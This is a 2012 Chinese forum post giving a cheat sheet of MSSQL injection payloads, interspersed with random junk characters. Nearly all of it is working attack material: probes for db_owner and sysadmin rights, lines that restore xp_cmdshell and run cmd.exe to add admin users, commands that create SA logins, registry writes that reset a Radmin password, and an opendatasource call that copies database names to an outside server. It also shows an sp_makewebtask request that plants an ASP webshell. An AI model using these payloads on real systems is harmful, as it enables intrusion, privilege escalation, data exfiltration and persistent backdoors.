找回密码
 立即注册
查看: 3014|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的# ~; D; ?9 k( K) M5 V& H, R
and 1=(Select IS_MEMBER('db_owner'))
4 X- x9 y) Q  YAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--) ^5 o/ B8 s3 x( ?

9 D  P* ^) ]* p1 N//检测是否有读取某数据库的权限; s- X- C8 |- f1 y0 B
and 1= (Select HAS_DBACCESS('master'))7 Y% X2 r( L7 N$ ?- }
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --$ b' R- u9 S5 K0 O# [6 ]
. c+ b7 d4 ?3 Y- o8 Y

& }0 s3 o  z: i. d数字类型
3 p. N6 p$ v) Z' a; M0 Uand char(124)%2Buser%2Bchar(124)=0
" h/ Z7 a2 ]" k6 F( m" @$ P( g7 d- g9 p
字符类型% z6 l2 V6 x! ]; s; S; e% G1 o$ C6 k
' and char(124)%2Buser%2Bchar(124)=0 and ''='" F! L* U3 t: Y( \' P% Y% u! e
; ^8 E% x) W$ N# D" K/ o  n
搜索类型
: p+ f8 |) x5 B1 Z: [2 I' and char(124)%2Buser%2Bchar(124)=0 and '%'='
0 X+ g) G! I2 o6 R
+ y2 Z. t# Z9 d/ S) r% d0 i' i爆用户名
$ a! C; g3 L0 ~# A3 Rand user>0
1 i: v1 a% D. ~  P, @8 Q' and user>0 and ''='$ @" i3 V' i, F' u  c& X& i* {' C

$ O- C. r7 n2 w1 C检测是否为SA权限/ ~/ c6 X& F( g4 t/ U$ \: V- T
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--+ D! @/ g. O' s; V/ Q+ D  l; d
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --( n7 }% f. D. |$ h- e' c! E1 n1 ]
! t8 t* A5 H, F1 H7 J" d  o9 t
检测是不是MSSQL数据库3 G$ n- p; w3 a8 X, H
and exists (select * from sysobjects);--
3 G( I* n1 j. L" _. j' m7 N3 a- Z$ v& u* c" @, J
检测是否支持多行1 B" Y0 I0 b5 O8 S8 D$ @
;declare @d int;--& b, D. O, P& y  F2 P1 l: W: ]

$ t/ X' @  V! ?5 K- f8 y9 q' x恢复 xp_cmdshell
: P' |7 x0 o8 W' [3 C# M;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
( {5 c* A. i2 I1 I3 B# `% ]: b# `
6 b2 l% @  I& c0 c' r* u/ a3 A4 N$ C& P1 T3 Q3 T( _+ T5 o8 l, F
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')5 u% g) }. i/ Q' c0 h% K

5 N# h1 u9 d; T# }//-----------------------8 v; H/ f% P- W1 m0 w1 C! `
//       执行命令
3 G' p- m$ }- p//-----------------------0 k1 Y5 _! i( r$ I. V
首先开启沙盘模式:
2 z% z. E( H3 Y. I! g& S/ Cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1- g: I! a9 K5 K4 H$ L" J" h

  U. x4 E- j: A然后利用jet.oledb执行系统命令
% L" z% ^) N% o4 ]3 q. Mselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. Z$ i' F+ @9 \/ y
$ H5 r6 A' U" C5 D执行命令0 s, K# D" R; ]+ M/ z3 k" b
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ m- f5 E2 ?# H; Z
, H2 }2 e' Z% Z6 }EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'( [3 L$ S4 p- y) `& u+ M7 M) l8 F
$ n7 D$ f/ N0 H& t& a8 P% \7 P
判断xp_cmdshell扩展存储过程是否存在:: k5 Z7 B' e; v) }7 U
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
4 }  T' E9 _8 X( Z$ s* ^7 H
! ?4 Y1 F1 v5 a! y( X  O写注册表
9 c7 z5 g7 Q. b2 Fexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; O( g" _" h  D) `0 J- H; K# q

4 W' r4 S: o/ k7 I' ?. v7 yREG_SZ
9 n$ D3 c  z3 c# J0 ~  P
9 t7 A/ B9 \0 D& b- M! h5 A7 P读注册表
; u* j* c& X& Mexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
8 _8 K( H! T1 t' k- D) |# ^. `9 H) D8 y
读取目录内容
6 t1 {* H) g; H2 i1 Uexec master..xp_dirtree 'c:\winnt\system32\',1,1& w- I( T+ F' i: o7 Q$ O
6 ]! t3 t5 w" T: `! q' `5 i
8 Y0 e' c5 U1 {, L/ ~" [
数据库备份
6 c% Y2 N* c/ ]: p) b5 Z2 k& {8 [backup database pubs to disk = 'c:\123.bak'
# z, Z! k# B4 j: v+ ^
, \: h4 v$ |" B. A6 }//爆出长度
) c; Y. e' _; rAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& W0 p+ A) W' X0 C; W3 a5 x$ I1 j  H5 S; p6 U: a. q; J
5 V  |* v2 @; t. M
$ N1 S$ U- {* }, [9 Z3 u- E
更改sa口令方法:用sql综合利用工具连接后,执行命令:
) X; G- I& c' Z- ^# ^exec sp_password NULL,'新密码','sa'
3 M- k# @( t, C! e
( K( Y# B# o; v5 d1 R# s; ~+ t8 u2 j添加和删除一个SA权限的用户test:4 t2 K2 P6 C! U+ D+ I2 |7 i
exec master.dbo.sp_addlogin test,95307720 w; R; ^% e: E1 J! t3 S
exec master.dbo.sp_addsrvrolemember test,sysadmin
" P$ N# c' g! |$ a# v
4 n7 V& f: y* a/ n9 q删除扩展存储过过程xp_cmdshell的语句:
8 a6 a' s4 U& ]; N' ~. k$ W6 hexec sp_dropextendedproc 'xp_cmdshell'
: k+ c1 D  _% u% E# V( b" `- o" }. X% Z
( _- R# z9 `: ~' N6 d, i添加扩展存储过过程/ z7 e# @1 x# q& j/ u' o
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'& f" g/ z6 O2 [0 J; S7 p% B1 ^5 m
GRANT exec On xp_proxiedadata TO public
8 g' ~& ?. y; m: e6 M. Z
1 H2 n+ S6 g- f/ e3 k0 w6 V, S% f! L: D4 z0 N5 \
停掉或激活某个服务。6 p6 I/ \2 P1 T2 b5 t; I
' H4 B% u5 H& A. z! q
exec master..xp_servicecontrol 'stop','schedule'+ M9 g' z( Z( Z( ]4 l3 b
exec master..xp_servicecontrol 'start','schedule'
. H' O$ ^: n  z$ _. Q
" G- Z. i7 W( xdbo.xp_subdirs
- K5 q* V$ C9 J1 r9 Y
* Q! z6 k. {( D( w" Y6 J只列某个目录下的子目录。
7 A% K( h% l& {  @xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
& k( E) P( L. u4 T$ z# Y1 d0 q9 j+ ]/ ^: S5 O4 a
dbo.xp_makecab
: B4 h7 Z7 j# {+ E7 l% D' {  A* N' k! R
将目标多个档案压缩到某个目标档案之内。0 h6 a# X% h. \9 j
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。8 W2 i+ Q8 P: J& P+ D

+ @, @% r  e! E) O; k9 Gdbo.xp_makecab
9 A' j1 R* s0 h- ?( X7 ~+ G'c:\test.cab','mszip',1,
) u& g" V! G  S' h0 m'C:\Inetpub\wwwroot\SQLInject\login.asp',: F3 c8 m( B7 S
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
& ?" E: k' S& S$ Y1 ?/ [" r  _5 Z3 p/ _: r* S4 e
xp_terminate_process) T7 d/ s: O0 i5 P+ r
) t/ L* g, r& r# Y
停掉某个执行中的程序,但赋予的参数是 Process ID。
! R1 H, m9 d4 z. u2 ^2 o利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
5 f; ^( g/ g' L4 ?8 Y8 x( [$ N) D1 H: B% Y( `
xp_terminate_process 2484  D9 p/ N# F0 q2 c: s6 T6 B( m  b

2 u( Q8 ]* {) f# `# a+ G9 nxp_unpackcab7 J6 A1 |4 h9 p- [) Q3 C& d3 r  Y

( |0 _6 L: ]7 a0 w* A/ T1 Q解开压缩档。) ?- G8 P& X4 p& ^$ a6 ~
: F3 r) U2 E, d5 {* M
xp_unpackcab 'c:\test.cab','c:\temp',1+ p' Z4 y: g/ P
' }& D" I( ?1 Q" Y( M7 R

5 ]2 G# }1 W6 O* N" l! U* Z某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
* b& }7 Y; `8 g, ~3 a7 F) R1 f8 h4 b+ o* h
create database lcx;& a& n/ w5 T8 m1 c& i' x
Create TABLE ku(name nvarchar(256) null);0 a7 N/ g5 n1 ~0 I7 P0 d/ V
Create TABLE biao(id int NULL,name nvarchar(256) null);+ M7 R3 R8 n' j& l" K6 P4 j9 B
( p& P8 {+ g; A  M; ^8 z
//得到数据库名
" {: f7 I+ k7 c) d6 Linsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
2 l; S: L5 D) {, o& T$ u/ z$ c3 z: S) v+ d7 P" b3 U" U

8 B; \' ~! `# E4 {7 R( s//在Master中创建表,看看权限怎样
' \( s  x. N- z& X% H2 A8 UCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--. q3 H. x3 Y8 O, G1 ^  i3 F

, H8 P5 G! U# R2 ^4 t用 sp_makewebtask直接在web目录里写入一句话马:
1 n( w+ [! H* d. n: I! Ehttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--2 o6 [3 T5 A, g/ x) `; W1 m

9 \1 P0 E) n6 X% m3 }//更新表内容
' W0 k5 a4 ~4 A7 }1 aUpdate films SET kind = 'Dramatic' Where id = 123+ v( P' J  v/ L; `0 r

1 n4 C( Q$ l  H//删除内容+ c; @+ C7 g3 p
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表